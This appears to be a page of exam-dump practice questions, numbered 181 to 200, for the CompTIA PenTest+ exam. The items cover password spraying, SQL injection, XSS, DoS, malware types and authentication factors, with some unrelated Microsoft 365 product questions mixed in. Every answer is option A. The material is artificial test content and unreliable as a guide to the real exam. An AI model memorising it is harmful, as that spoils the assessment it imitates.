CompTIA PenTest+ PT0-003  Exam Dumps and Practice Test Questions Set 10 Q181-200

Visit here for our full CompTIA PT0-003 exam dumps and practice test questions.

Question 181:

A penetration tester finds that a company’s VPN allows unlimited failed login attempts before locking out. Which type of attack is most likely to succeed against this configuration?

A) Password spraying

B) Phishing

C) SQL injection

D) Cross-site scripting

Answer: A) Password spraying

Explanation:

Password spraying is an attack that targets multiple accounts using a small set of common passwords, rather than attempting every possible password for a single account. This approach allows attackers to avoid account lockouts or detection mechanisms that trigger after repeated failures. In the scenario described, the VPN allows unlimited failed login attempts, making it highly vulnerable to password spraying because attackers can attempt many combinations across multiple accounts without restriction. Attackers often leverage previously leaked passwords, common patterns, or organizational conventions when executing password spraying attacks. Organizations mitigate this risk by implementing multi-factor authentication (MFA), enforcing strong password policies, setting account lockout thresholds, monitoring authentication attempts, and employing behavioral analytics to detect anomalies.

Phishing is a social engineering technique that attempts to trick users into disclosing credentials or sensitive information. While phishing can successfully compromise accounts, it does not exploit the configuration of unlimited login attempts directly. Phishing relies on human error rather than automated credential testing.

SQL injection is a technical attack that manipulates backend database queries through unvalidated input. SQL injection targets data storage and retrieval systems and is unrelated to password attempts on authentication interfaces like VPNs. It does not exploit unlimited login attempts.

Cross-site scripting (XSS) injects malicious scripts into web applications to execute in client browsers. XSS attacks target client-side vulnerabilities and user sessions rather than authentication systems. It is unrelated to password-based attacks on VPN systems.

Unlimited failed login attempts create an environment where credential-based attacks such as password spraying are highly feasible. Attackers can attempt popular passwords across multiple accounts over extended periods without triggering automated defenses. Security teams can defend against this by limiting login attempts, enabling MFA, monitoring login activity for unusual patterns, and educating users about strong, unique passwords. Password spraying attacks demonstrate how technical misconfigurations combined with predictable user behavior can create significant security vulnerabilities. By applying layered security controls, organizations can reduce the likelihood of successful attacks, protect sensitive resources, and improve resilience against credential-based threats. Continuous monitoring, alerting, and proactive mitigation are key strategies to address the risk presented by systems with unlimited authentication attempts.

Question 182:

Which attack exploits weaknesses in user input validation to manipulate backend database queries?

A) SQL injection

B) Cross-site scripting (XSS)

C) Password spraying

D) Denial of Service (DoS)

Answer: A) SQL injection

Explanation:

SQL injection is a cyberattack that targets backend databases by exploiting vulnerabilities in user input handling. When a web application does not properly validate or sanitize input, attackers can inject malicious SQL statements to manipulate queries. These attacks can extract sensitive data, modify or delete records, bypass authentication, or execute administrative commands on the database. Attackers often automate SQL injection using tools to systematically test for vulnerabilities across multiple input fields. SQL injection is highly effective against poorly coded applications and databases that use dynamic queries without prepared statements or parameterized inputs. Preventive measures include input validation, prepared statements, stored procedures, least privilege database access, web application firewalls (WAFs), regular code audits, and penetration testing. Organizations implement monitoring to detect unusual database activity, query patterns, or excessive access to sensitive tables.

Cross-site scripting (XSS) targets client-side scripts rather than backend databases. XSS exploits web application vulnerabilities to execute malicious code in users’ browsers, steal sessions, or manipulate web content. It does not directly affect database queries or data integrity.

Password spraying attacks attempt commonly used passwords across multiple accounts. They target authentication systems rather than database vulnerabilities. Password spraying is unrelated to input validation issues and SQL query manipulation.

Denial of Service (DoS) attacks overwhelm system or network resources to make services unavailable. DoS affects availability rather than data integrity or query manipulation, making it unrelated to SQL injection.

SQL injection demonstrates the importance of secure coding practices, proper input validation, and access controls. Developers should avoid directly concatenating user input into SQL statements and use parameterized queries. Regular security assessments, automated vulnerability scanning, and penetration testing help identify injection points before attackers exploit them. SQL injection attacks emphasize the need for a layered defense strategy, combining secure development practices, monitoring, and incident response planning. Effective mitigation reduces the risk of data breaches, operational disruption, and unauthorized access to sensitive information, highlighting the critical intersection of application security, database management, and user input handling in organizational cybersecurity.

Question 183:

Which type of attack sends massive amounts of traffic to overwhelm a target system?

A) Denial of Service (DoS)

B) Password spraying

C) Cross-site scripting (XSS)

D) Phishing

Answer: A) Denial of Service (DoS)

Explanation:

A Denial of Service (DoS) attack is a network or application-based attack that floods a system with excessive traffic or resource requests to render it unavailable to legitimate users. DoS attacks can exploit bandwidth, server capacity, memory, or application limits. Attackers may target single servers, network devices, or entire services. Common techniques include UDP floods, TCP SYN floods, HTTP request floods, and amplification attacks. The goal is to disrupt operations, degrade performance, or prevent access to critical services. Organizations deploy mitigations such as rate limiting, firewalls, load balancers, traffic monitoring, cloud-based DDoS protection, and network segmentation to reduce the impact of DoS attacks. Detecting unusual traffic patterns, monitoring system logs, and preparing incident response plans are key to defending against DoS attacks.

Password spraying attacks target multiple accounts with a few common passwords to avoid detection. Password spraying focuses on authentication, not overwhelming system resources, making it unrelated to DoS attacks.

Cross-site scripting (XSS) exploits client-side code vulnerabilities to execute malicious scripts in browsers. XSS attacks manipulate user interaction rather than system resource availability, making it unrelated to DoS.

Phishing is a social engineering attack that tricks users into revealing sensitive information. Phishing targets human behavior rather than system capacity or availability, and therefore is not a DoS method.

DoS attacks highlight the importance of availability in the cybersecurity triad alongside confidentiality and integrity. Attackers may use DoS to distract security teams while performing other attacks, or simply to cause operational disruption. Mitigation strategies involve combining network monitoring, traffic filtering, redundancy, and cloud-based solutions. DoS attacks demonstrate how overwhelming system resources can disrupt business operations and create vulnerabilities that could be exploited further. Understanding attack vectors, implementing proactive defenses, and maintaining incident response plans are essential for minimizing impact and maintaining service continuity.

Question 184:

Which malware hides within the operating system to maintain long-term access?

A) Rootkit

B) Trojan horse

C) Adware

D) Ransomware

Answer: A) Rootkit

Explanation:

A rootkit is a type of malware designed to conceal its presence within an operating system while maintaining persistent access for attackers. Rootkits often operate at the kernel level or user mode, allowing attackers to monitor system activity, manipulate files, and install additional malware. Because rootkits integrate deeply into the operating system, they are difficult to detect using standard antivirus software. Detection requires specialized tools, offline scanning, integrity checks, and behavioral monitoring. Rootkits can be delivered via Trojan horses, malicious downloads, phishing, or exploitation of vulnerabilities. Once installed, they can steal credentials, exfiltrate data, or enable remote access for extended periods without the user’s knowledge. Organizations mitigate rootkit risks through least privilege enforcement, patch management, monitoring system integrity, and endpoint detection and response (EDR) solutions.

Trojan horses are deceptive programs that appear legitimate to deliver malicious payloads. While Trojans may install rootkits, they are primarily characterized by deception rather than stealthy persistence within the OS.

Adware delivers advertisements and tracks user behavior to generate revenue. Adware does not maintain hidden control over systems or provide deep access, unlike rootkits.

Ransomware encrypts files and demands payment for decryption. Ransomware is overt and extortion-based, rather than stealth-focused like rootkits.

Rootkits are particularly dangerous due to their ability to evade detection, maintain long-term control, and facilitate further attacks. They highlight the importance of secure development, endpoint monitoring, and proactive system audits. By understanding rootkit behavior and implementing layered defenses, organizations can reduce exposure, detect anomalous activities, and protect sensitive data. Rootkits demonstrate how attackers exploit both technical and system-level vulnerabilities to maintain persistent unauthorized access, emphasizing the need for vigilance, monitoring, and strong security practices.

Question 185:

Which attack attempts to trick users into revealing credentials or personal information through deceptive communication?

A) Phishing

B) SQL injection

C) Brute force attack

D) Denial of Service (DoS)

Answer: A) Phishing

Explanation:

Phishing is a social engineering attack that manipulates users into disclosing sensitive information, such as usernames, passwords, credit card numbers, or personal data. Phishing typically involves impersonating trusted entities through email, messaging, or fraudulent websites. Attackers may use urgency, fear, or incentives to prompt victims to act quickly without verifying legitimacy. Variants include spear phishing, which targets specific individuals or roles, whaling aimed at executives, and clone phishing, where legitimate communications are duplicated with malicious intent. Phishing attacks exploit human behavior rather than technical vulnerabilities, making user education, awareness, and vigilance essential components of defense. Organizations deploy email filtering, anti-malware tools, multi-factor authentication (MFA), URL scanning, and monitoring suspicious activity to mitigate phishing risks. Regular training and simulated phishing campaigns help users recognize suspicious communications and avoid credential compromise.

SQL injection manipulates backend database queries through unvalidated input. SQL injection targets server-side systems and databases, not user behavior.

Brute force attacks systematically attempt every possible password for a single account until successful. While brute force targets authentication, it is a technical attack, unlike phishing, which targets the human element.

Denial of Service (DoS) attacks flood resources to make services unavailable. DoS attacks target system availability rather than deceiving users to reveal sensitive information.

Phishing remains one of the most effective and widely used attack methods because it exploits trust, fear, and urgency. Organizations strengthen defenses by combining technical controls like MFA and monitoring with user education and incident response strategies. By simulating phishing attacks and analyzing behavior, organizations can measure effectiveness and improve user awareness. Phishing highlights the need to integrate technology, policy, and human vigilance to reduce successful attacks and protect sensitive information.

Question 186:

Which type of attack manipulates web application input to execute malicious scripts in users’ browsers?

A) Cross-site scripting (XSS)

B) SQL injection

C) Brute force attack

D) Denial of Service (DoS)

Answer: A) Cross-site scripting (XSS)

Explanation:

Cross-site scripting (XSS) is an attack that injects malicious scripts into web applications to execute in the browsers of unsuspecting users. Attackers exploit vulnerabilities in input validation, such as unsanitized form fields, URL parameters, or comment sections, to insert scripts that manipulate the page content, steal session cookies, capture keystrokes, or redirect users to malicious websites. XSS is a client-side attack that targets users interacting with the compromised application rather than the server itself. There are three main types of XSS: stored, reflected, and DOM-based. Stored XSS occurs when malicious input is permanently stored on the server and served to multiple users, reflected XSS is triggered immediately via URL or input reflection, and DOM-based XSS manipulates the Document Object Model of the client browser.

SQL injection targets backend database queries by injecting malicious SQL commands. SQL injection is a server-side attack designed to manipulate data in the database rather than affecting client-side scripts, making it distinct from XSS.

Brute force attacks attempt to guess passwords systematically for single accounts. Brute force is an authentication attack and does not involve client-side script execution or web application input manipulation.

Denial of Service (DoS) attacks overwhelm systems with excessive traffic or requests, aiming to degrade availability. DoS focuses on resource exhaustion and operational disruption rather than exploiting user-facing web input.

XSS is particularly dangerous because attackers can hijack sessions, steal sensitive information, distribute malware, or manipulate web content without the user realizing it. Defense strategies include input validation, output encoding, implementing Content Security Policy (CSP), using web application firewalls (WAFs), and performing secure code reviews. Organizations also educate developers on secure coding practices and test applications for vulnerabilities before deployment. XSS attacks highlight the importance of considering both technical and human factors in security, as users may inadvertently execute malicious scripts. By understanding and mitigating XSS, organizations protect user data, maintain application integrity, and ensure safe web interactions, reducing risk to both the end-user and enterprise systems.

Question 187:

Which authentication factor is based on a unique physical or behavioral trait of the user?

A) Biometric authentication

B) Knowledge-based authentication

C) Possession-based authentication

D) Certificate-based authentication

Answer: A) Biometric authentication

Explanation:

Biometric authentication verifies identity using unique physical or behavioral characteristics of a user. Common biometric factors include fingerprints, facial recognition, iris scans, voice patterns, and behavioral traits like typing rhythm. Biometric authentication provides a higher level of security compared to traditional knowledge-based or possession-based methods because these characteristics are inherently unique and difficult to duplicate or share. Biometric factors are commonly used in multi-factor authentication (MFA) systems, where they are combined with something the user knows (password) or something the user possesses (token). Effective biometric systems require secure template storage, encryption, liveness detection to prevent spoofing, and privacy controls to safeguard sensitive personal data.

Knowledge-based authentication relies on information the user knows, such as passwords or PINs. While knowledge-based factors are easy to implement and widely used, they are vulnerable to phishing, credential theft, and reuse. They are not intrinsic to the user and can be compromised without physical presence or behavioral verification.

Possession-based authentication relies on items the user has, such as security tokens, smart cards, or mobile devices. Possession factors verify ownership, not inherent user traits. They can be lost or stolen and require supplemental security measures.

Certificate-based authentication uses cryptographic certificates to verify identity digitally. Certificates depend on trusted authorities and encryption, not on human traits or characteristics.

Biometric authentication strengthens identity verification by tying access control directly to unique physical or behavioral attributes. It reduces reliance on passwords and tokens, which may be stolen, guessed, or shared. Organizations integrate biometrics with other authentication factors to improve security while maintaining user convenience. Biometric systems must address false acceptance rates, false rejection rates, template security, and privacy concerns. With proper implementation, biometrics enhance access control, deter unauthorized access, and provide a reliable method for identity verification in corporate, government, and mobile environments. By combining technical, procedural, and behavioral controls, organizations can leverage biometric authentication to secure sensitive systems while providing a seamless user experience.

Question 188:

Which malware encrypts a user’s files and demands payment for decryption?

A) Ransomware

B) Rootkit

C) Adware

D) Trojan horse

Answer: A) Ransomware

Explanation:

Ransomware is a type of malware that encrypts a user’s files or locks access to the system and demands a ransom payment for restoration. Attackers typically demand cryptocurrency payments to maintain anonymity. Ransomware can spread through phishing emails, malicious downloads, drive-by attacks, or network exploits. Once executed, ransomware encrypts files using strong cryptographic algorithms, making recovery without the decryption key difficult or impossible. Organizations mitigate ransomware risk through regular data backups, offline storage, anti-malware solutions, patch management, endpoint protection, network segmentation, and user training. Ransomware attacks are particularly dangerous because they can halt business operations, cause financial loss, and damage reputations. Incident response plans, including isolation of affected systems and disaster recovery procedures, are critical in minimizing damage.

Rootkits are malware designed to hide within the operating system to maintain persistent access. Rootkits operate stealthily rather than overtly encrypting files or demanding payment.

Adware delivers unsolicited advertisements and tracks user behavior for monetization. Adware is intrusive but generally non-destructive and does not encrypt files or extort payment.

Trojan horses disguise themselves as legitimate software to deliver malicious payloads. Trojans may deliver ransomware, but they are characterized by deception, not encryption and ransom demands themselves.

Ransomware illustrates the importance of layered defenses combining technical, procedural, and human-centered strategies. Organizations deploy preventive measures, backup strategies, and rapid incident response capabilities to minimize impact. Educating users about phishing and unsafe downloads reduces the likelihood of ransomware infection. Additionally, monitoring endpoints and networks for anomalous file activity helps detect ransomware early. Ransomware remains a prevalent threat due to its direct financial impact, ease of distribution, and ability to disrupt critical operations. Effective mitigation requires ongoing awareness, robust security practices, and comprehensive preparedness to maintain business continuity and protect sensitive data.

Question 189:

Which Microsoft solution helps manage devices, enforce compliance, and control access to company resources?

A) Microsoft Intune

B) Microsoft OneDrive

C) Microsoft Planner

D) Microsoft Defender for Identity

Answer: A) Microsoft Intune

Explanation:

Microsoft Intune is a cloud-based service that manages devices, applications, and compliance policies. Intune enables organizations to enforce security policies across company-owned and BYOD (bring your own device) environments, control access to corporate resources, and ensure that devices comply with security standards. Administrators can configure device encryption, password requirements, application restrictions, and conditional access rules. Intune integrates with Azure Active Directory for identity-based access control and can deploy security updates, monitor device health, and enforce compliance with organizational policies. Intune supports multiple platforms, including Windows, macOS, iOS, and Android, providing a unified endpoint management solution.

Microsoft OneDrive is a cloud storage and file-sharing platform, focusing on collaboration and data storage. OneDrive does not manage device compliance or enforce security policies.

Microsoft Planner is a task and project management tool, organizing work assignments and workflows. Planner is not designed to manage devices or control access to company resources.

Microsoft Defender for Identity monitors user accounts and authentication activity for suspicious behavior. While it enhances identity security, it does not directly manage devices or enforce compliance policies.

Intune strengthens security by combining device management, application control, and compliance enforcement. It enables conditional access, ensuring only compliant devices can access corporate data. Intune’s integration with other Microsoft security solutions provides centralized monitoring, reporting, and enforcement. Organizations can deploy updates, restrict data access, and respond to policy violations quickly. Intune supports modern workforces by enabling secure mobility while maintaining corporate control, ensuring that devices, applications, and user access adhere to organizational security standards. Effective Intune deployment reduces the risk of data breaches, unauthorized access, and non-compliant devices while facilitating efficient management and secure access for employees across platforms and locations.

Question 190:

Which attack is characterized by attempting multiple password combinations on a single account until the correct one is found?

A) Brute force attack

B) Password spraying

C) Phishing

D) SQL injection

Answer: A) Brute force attack

Explanation:

A brute force attack is a method of systematically attempting every possible password combination for a single account until the correct password is discovered. Attackers often use automated tools capable of generating millions of guesses quickly. Brute force attacks are effective against weak, simple, or short passwords but can be mitigated by account lockout mechanisms, multi-factor authentication (MFA), rate limiting, and strong password policies. Brute force attacks require persistence and computational resources, and successful exploitation can compromise user accounts, sensitive data, and administrative access, potentially affecting the broader system. Monitoring failed login attempts and implementing anomaly detection helps organizations identify and respond to brute force attempts promptly.

Password spraying targets multiple accounts using a few common passwords, avoiding lockouts. Unlike brute force, it does not focus exhaustively on a single account.

Phishing attacks rely on tricking users into revealing credentials or sensitive information through deceptive communication. Phishing is human-centered, not automated password guessing.

SQL injection exploits database query vulnerabilities by injecting malicious input. SQL injection targets data integrity and backend systems rather than account passwords.

Brute force attacks emphasize the need for strong, unique passwords, MFA, monitoring authentication logs, and anomaly detection. Organizations combine technical defenses with user awareness training to reduce the risk of compromise. Brute force attacks illustrate how automated credential guessing threatens access control and highlight the importance of layered security measures that protect sensitive accounts and critical systems. Consistent monitoring and security enforcement are key to mitigating brute force risks and maintaining operational integrity and data protection.

Question 191:

Which Microsoft 365 service provides task and project management capabilities to organize work for teams?

A) Microsoft Planner

B) Microsoft OneDrive

C) Microsoft Intune

D) Microsoft Defender for Identity

Answer: A) Microsoft Planner

Explanation:

Microsoft Planner is a cloud-based task and project management tool integrated with Microsoft 365. Planner allows teams to create, assign, and track tasks across projects while providing visual dashboards, charts, and progress indicators to manage workloads effectively. Users can create buckets for tasks, add due dates, attach files, assign tasks to team members, and track progress with Kanban-style boards. Planner integrates with Microsoft Teams, Outlook, and SharePoint to provide seamless collaboration and centralize task management. Its primary purpose is productivity and organization, enabling teams to plan work, visualize progress, and ensure accountability within a collaborative environment. Planner improves project visibility, reduces communication overhead, and allows for efficient resource allocation.

Microsoft OneDrive focuses on cloud storage and file-sharing capabilities. While OneDrive supports collaboration by storing files, it does not provide task or project management functionality.

Microsoft Intune manages devices, applications, and compliance policies. Intune is focused on securing endpoints and enforcing access control rather than organizing tasks or managing projects.

Microsoft Defender for Identity monitors user activity and authentication events for suspicious behavior and potential account compromise. Defender for Identity enhances security posture but does not provide task or project management features.

Planner emphasizes collaborative work organization through visual task management and integration with productivity tools. Teams can create projects, assign responsibilities, track deadlines, and receive notifications to stay aligned with objectives. Planner also provides reporting capabilities, showing task progress, overdue items, and resource allocation. By leveraging Planner, organizations can improve workflow transparency, enhance accountability, and reduce task duplication. Planner supports real-time updates, ensuring all team members have access to the most current information. It is particularly effective for remote or hybrid teams, enabling distributed collaboration and structured project management. Its integration with other Microsoft 365 applications ensures that tasks, files, and communications are linked, reducing the complexity of managing multiple platforms. Planner demonstrates how task management tools improve operational efficiency and team collaboration while complementing security and storage tools within the Microsoft 365 ecosystem.

Question 192:

Which attack involves sending deceptive communications to manipulate users into performing actions or divulging information?

A) Phishing

B) Brute force attack

C) SQL injection

D) Cross-site scripting (XSS)

Answer: A) Phishing

Explanation:

Phishing is a social engineering attack that deceives users into revealing sensitive information or performing actions beneficial to attackers. It often occurs via email, instant messaging, phone calls, or fraudulent websites that impersonate legitimate entities. Attackers create urgency, fear, or curiosity to prompt users to act quickly, bypassing normal security caution. Variants include spear phishing, which targets specific individuals, whaling aimed at executives, and clone phishing, which duplicates legitimate communications with malicious intent. Phishing is highly effective because it exploits human behavior rather than technical vulnerabilities. Organizations mitigate phishing through multi-factor authentication (MFA), email filtering, web filtering, training, and awareness campaigns. Security teams also conduct simulated phishing exercises to test user readiness and reinforce safe behavior.

Brute force attacks systematically attempt multiple password combinations to compromise accounts. Brute force attacks target authentication systems rather than exploiting user behavior.

SQL injection manipulates database queries through unvalidated input. SQL injection targets backend systems, not human decision-making or behavior.

Cross-site scripting (XSS) injects malicious scripts into client browsers to steal session data or manipulate web content. XSS targets technical vulnerabilities rather than social behavior.

Phishing highlights the critical role of user awareness and education in cybersecurity. Effective mitigation combines technical controls like filtering, MFA, and anomaly detection with behavioral training. Organizations benefit from continuous evaluation of phishing attempts and reinforcement of secure practices. The attack demonstrates that human factors often represent the weakest link in security, requiring both policy and practical interventions. By educating users to recognize suspicious messages, verify sources, and avoid risky behaviors, organizations strengthen defenses against credential theft, identity compromise, and malware distribution. Phishing emphasizes the interplay of human and technical elements in comprehensive cybersecurity strategy.

Question 193:

Which attack attempts to guess passwords for multiple accounts using a small set of common passwords?

A) Password spraying

B) Brute force attack

C) SQL injection

D) Ransomware

Answer: A) Password spraying

Explanation:

Password spraying is an attack where attackers attempt a few common passwords across a large number of accounts, rather than attempting all possible combinations for a single account. This approach avoids triggering account lockouts and can be highly effective in environments with weak password policies or reused passwords. Attackers typically use previously leaked credentials, default passwords, or simple predictable passwords. Security teams mitigate password spraying through multi-factor authentication (MFA), account lockout policies, strong password enforcement, and monitoring authentication logs for anomalous patterns. Detection involves analyzing failed login attempts across accounts and identifying repeated attempts using the same password.

Brute force attacks attempt every possible password combination on a single account. Brute force is more exhaustive and often triggers security measures like lockouts, unlike password spraying.

SQL injection targets backend database queries via input manipulation to retrieve or alter data. SQL injection attacks are unrelated to authentication attempts or password guessing.

Ransomware encrypts files and demands payment for decryption. Ransomware attacks are not designed to guess passwords but to extort victims through file encryption.

Password spraying demonstrates the importance of layered security, combining technical safeguards and user awareness. Organizations protect accounts by enforcing strong password requirements, monitoring unusual login behavior, and integrating MFA. By understanding attacker behavior and techniques, security teams can proactively implement defenses and reduce the risk of credential compromise. Password spraying emphasizes that even simple misconfigurations or predictable behaviors can expose multiple accounts to compromise, highlighting the need for continuous monitoring, enforcement of security policies, and adoption of proactive protective measures. Organizations that combine awareness, technical controls, and auditing are better positioned to detect, prevent, and respond to password-based attacks.

Question 194:

Which attack exploits input vulnerabilities to retrieve or manipulate data in a database?

A) SQL injection

B) Cross-site scripting (XSS)

C) Phishing

D) Adware

Answer: A) SQL injection

Explanation:

SQL injection is a cyberattack that targets databases by exploiting unvalidated or improperly sanitized user input. Attackers insert malicious SQL commands into input fields or URLs to manipulate queries, retrieve sensitive data, modify records, or bypass authentication mechanisms. SQL injection is particularly effective against applications that dynamically construct SQL statements without using parameterized queries, stored procedures, or input validation. Prevention strategies include input validation, prepared statements, stored procedures, limiting database privileges, and monitoring for unusual query patterns. SQL injection attacks can result in data breaches, unauthorized access, and operational disruption, highlighting the importance of secure coding practices and robust application security measures.

Cross-site scripting (XSS) injects scripts into web applications for client-side execution, targeting users rather than databases. XSS is unrelated to manipulating backend SQL queries.

Phishing deceives users into revealing credentials or personal information. Phishing exploits human behavior, not database query vulnerabilities.

Adware delivers advertisements and tracks user activity for monetization. Adware does not manipulate databases or execute SQL commands.

SQL injection highlights the intersection of application design, input validation, and database security. Organizations implement secure coding practices, enforce least privilege access, conduct vulnerability scanning, and perform penetration testing to detect injection points. SQL injection attacks underscore the consequences of poor input handling and demonstrate the need for layered defenses, monitoring, and proactive mitigation. By addressing both technical and procedural aspects of application security, organizations protect data integrity, confidentiality, and availability, reducing the risk of compromise through targeted SQL exploitation.

Question 195:

Which malware primarily tracks user activity and displays advertisements without user consent?

A) Adware

B) Ransomware

C) Trojan horse

D) Rootkit

Answer: A) Adware

Explanation:

Adware is a type of malware that delivers unwanted advertisements and tracks user behavior for monetization purposes. Adware can display pop-ups, banners, or embedded ads in web browsers or applications. It collects information such as browsing habits, search history, or software usage patterns to generate targeted ads. While often not overtly destructive, adware can degrade system performance, compromise privacy, and act as a gateway for additional malware. Detection involves endpoint protection, anti-malware tools, and monitoring for unusual system behavior. Users should avoid installing unknown software and carefully review installation prompts to prevent adware inclusion. Organizations deploy security policies, web filters, and endpoint monitoring to mitigate adware risks.

Ransomware encrypts files and demands payment for decryption. It is extortion-based, not focused on advertising or tracking user activity.

Trojan horses disguise themselves as legitimate software to deliver malicious payloads. Trojans may deliver adware but are defined by their deceptive delivery mechanism rather than advertising behavior.

Rootkits hide within operating systems to maintain persistent access. Rootkits focus on stealth and control rather than monetization through advertisements or tracking.

Adware emphasizes the need for secure software practices, endpoint monitoring, and user awareness. Organizations should educate users about safe downloads, implement anti-malware defenses, and monitor for suspicious activity. Adware illustrates how malware can exploit user behavior for profit while compromising system performance and privacy. By combining technical controls, user education, and policy enforcement, organizations can minimize exposure to adware and maintain operational integrity, demonstrating that even non-destructive malware can create security and usability challenges.

Question 196:

Which authentication factor relies on something the user possesses, such as a smart card or security token?

A) Possession-based authentication

B) Knowledge-based authentication

C) Biometric authentication

D) Certificate-based authentication

Answer: A) Possession-based authentication

Explanation:

Possession-based authentication relies on an object or device that the user physically owns to verify identity. Examples include security tokens, smart cards, hardware keys, or mobile devices that generate one-time passcodes. This type of authentication is effective because it ties access to a physical object, which is difficult for attackers to replicate or use remotely without possession. Organizations often combine possession-based factors with knowledge-based (passwords) or biometric factors as part of multi-factor authentication (MFA) to strengthen security. Management of possession-based authentication requires procedures for issuing, revoking, and replacing tokens, as well as implementing secure distribution and usage policies to prevent theft or loss.

Knowledge-based authentication relies on information the user knows, such as a password or PIN. While widely used, knowledge-based methods can be compromised through phishing, social engineering, or credential reuse. Knowledge alone does not provide the physical verification that possession-based methods offer.

Biometric authentication relies on unique physical or behavioral characteristics, such as fingerprints, facial recognition, or iris scans. Biometric factors are inherent to the user and cannot be transferred like a token or smart card, making them distinct from possession-based factors.

Certificate-based authentication uses cryptographic certificates issued by trusted authorities to verify identity. Certificates are digital constructs, not physical objects owned by the user, and therefore differ from possession-based factors.

Possession-based authentication strengthens security by tying access to physical objects under the user’s control. Organizations enforce token management policies, secure storage, and MFA integration to mitigate risks associated with token theft, duplication, or loss. By combining possession factors with other authentication methods, businesses protect sensitive systems from unauthorized access, enhance identity verification, and reduce the likelihood of credential compromise. Possession-based authentication remains a critical component of access control strategies in enterprise, government, and financial environments where robust security is required. It complements knowledge-based and biometric factors to create a layered defense against both technical attacks and social engineering threats.

Question 197:

Which Microsoft security solution monitors on-premises Active Directory for suspicious activities and compromised accounts?

A) Microsoft Defender for Identity

B) Microsoft Intune

C) Microsoft OneDrive

D) Microsoft Planner

Answer: A) Microsoft Defender for Identity

Explanation:

Microsoft Defender for Identity is a cloud-based security solution designed to monitor user behavior and authentication events in on-premises Active Directory and Microsoft 365 environments. It continuously collects telemetry from directory services, analyzes authentication patterns, and uses machine learning to detect anomalies such as lateral movement, privilege escalation, unusual login attempts, or potential account compromise. Defender for Identity integrates with Azure AD and other Microsoft security services, providing actionable alerts that allow security teams to investigate threats quickly and remediate compromised accounts. It also supports behavioral analytics to identify insider threats, detect compromised credentials, and prevent unauthorized access before significant damage occurs.

Microsoft Intune focuses on device management, compliance enforcement, and conditional access policies. While Intune contributes to security posture, it does not monitor Active Directory for suspicious account activity or authentication anomalies.

Microsoft OneDrive is primarily a cloud storage platform enabling file storage, sharing, and synchronization. OneDrive does not provide monitoring for directory activity or account security alerts.

Microsoft Planner is a task and project management tool designed for organizing and tracking work within teams. Planner has no security monitoring capabilities and does not integrate with authentication systems for threat detection.

Defender for Identity provides specialized monitoring and threat detection capabilities, offering deep visibility into authentication events, user behavior, and potential compromise within an organization’s identity infrastructure. It correlates telemetry from multiple sources to generate comprehensive security alerts. Security teams can investigate incidents, identify compromised accounts, and take preventative measures to mitigate risks. By detecting suspicious activities such as unusual access patterns, multiple failed logins, or privilege abuse, Defender for Identity strengthens an organization’s cybersecurity posture. It also integrates with other Microsoft 365 security solutions to provide a unified approach to identity protection. Compared to Intune, OneDrive, or Planner, Defender for Identity is purpose-built to secure directory services and user identities, making it the most appropriate solution for detecting compromised accounts and preventing unauthorized access.

Question 198:

Which malware disguises itself as legitimate software to deliver a hidden malicious payload?

A) Trojan horse

B) Rootkit

C) Adware

D) Ransomware

Answer: A) Trojan horse

Explanation:

A Trojan horse is a type of malware that appears to be legitimate software while secretly performing malicious actions. Attackers use deception to trick users into installing Trojans, often by masquerading as utility tools, games, or software updates. Once executed, a Trojan can steal credentials, install additional malware, create backdoors, or provide remote control to attackers. Trojans rely on social engineering rather than exploiting technical vulnerabilities directly, making user behavior a critical factor in their success. Organizations defend against Trojans using endpoint protection, malware scanning, software verification, user education, and restricting execution of unverified software.

Rootkits embed themselves deeply into an operating system to hide processes, files, or activities, maintaining persistent control. While rootkits may be delivered via a Trojan, their defining feature is stealth and persistence, not initial deception.

Adware delivers unwanted advertisements and tracks user activity for monetization. Adware is generally non-malicious in function, although it can degrade performance and compromise privacy, unlike Trojans, which actively perform harmful operations.

Ransomware encrypts files or locks systems to demand payment. Ransomware is overt and extortion-focused, rather than relying on deception for initial delivery.

Trojan horses highlight the risk posed by deceptive software, emphasizing the importance of user awareness, secure downloading practices, and robust endpoint defenses. Trojans demonstrate that even software appearing legitimate can compromise security and introduce secondary threats like rootkits or ransomware. Organizations combine technical controls, behavioral training, and monitoring to reduce Trojan infections and minimize potential damage. Properly implemented policies, verification of software sources, and awareness of social engineering tactics are essential for mitigating the threat posed by Trojan malware.

Question 199:

Which Microsoft service provides cloud storage, file sharing, and integration with Office 365 applications?

A) Microsoft OneDrive

B) Microsoft Intune

C) Microsoft Planner

D) Microsoft Defender for Identity

Answer: A) Microsoft OneDrive

Explanation:

Microsoft OneDrive is a cloud storage platform that allows users to store files, share them securely, and collaborate in real time. OneDrive integrates with Microsoft Office applications, Teams, and SharePoint, enabling users to co-author documents, maintain version control, and access files from any device. Files are encrypted both in transit and at rest to maintain confidentiality. Administrators can enforce sharing permissions, track activity, apply retention policies, and monitor access to ensure compliance. OneDrive also provides ransomware detection, file recovery, and auditing features to maintain security and operational resilience.

Microsoft Intune is a device and application management solution. While Intune contributes to endpoint security, it does not provide cloud storage or file-sharing capabilities.

Microsoft Planner is a project and task management tool, designed to organize work and track progress rather than storing or sharing files.

Microsoft Defender for Identity monitors authentication events for suspicious activity and compromised accounts. It is focused on security monitoring, not file storage or collaboration.

OneDrive enhances productivity and collaboration by providing secure, accessible, and centralized storage. Its integration with Microsoft 365 ensures seamless access and co-authoring capabilities. Users can access files across devices, while administrators maintain control through permissions, monitoring, and compliance policies. OneDrive reduces reliance on local storage, improves operational efficiency, and protects data integrity through built-in security and recovery features. It is an essential solution for modern workplaces, supporting mobility, collaboration, and secure data management.

Question 200:

Which attack involves overwhelming a system, network, or service with excessive traffic to disrupt availability?

A) Denial of Service (DoS)

B) Phishing

C) Password spraying

D) SQL injection

Answer: A) Denial of Service (DoS)

Explanation:

A Denial of Service (DoS) attack floods a system, network, or service with an excessive amount of traffic, overwhelming resources and preventing legitimate users from accessing services. DoS attacks exploit bandwidth, memory, or application limits, aiming to disrupt availability. Techniques include SYN floods, UDP floods, ICMP floods, and HTTP request floods. Organizations mitigate DoS attacks using rate limiting, traffic filtering, firewalls, load balancers, cloud-based DDoS protection, and network segmentation. Continuous monitoring of network traffic and system performance helps detect and respond to ongoing attacks. Incident response planning ensures rapid mitigation, preserving service continuity and reducing business impact.

Phishing manipulates users into revealing credentials or sensitive information. Phishing targets human behavior, not system availability.

Password spraying attempts common passwords across multiple accounts to avoid lockouts. Password spraying targets authentication, not system resource exhaustion.

SQL injection exploits database queries via unvalidated input to retrieve or manipulate data. SQL injection affects data integrity and access, not availability.

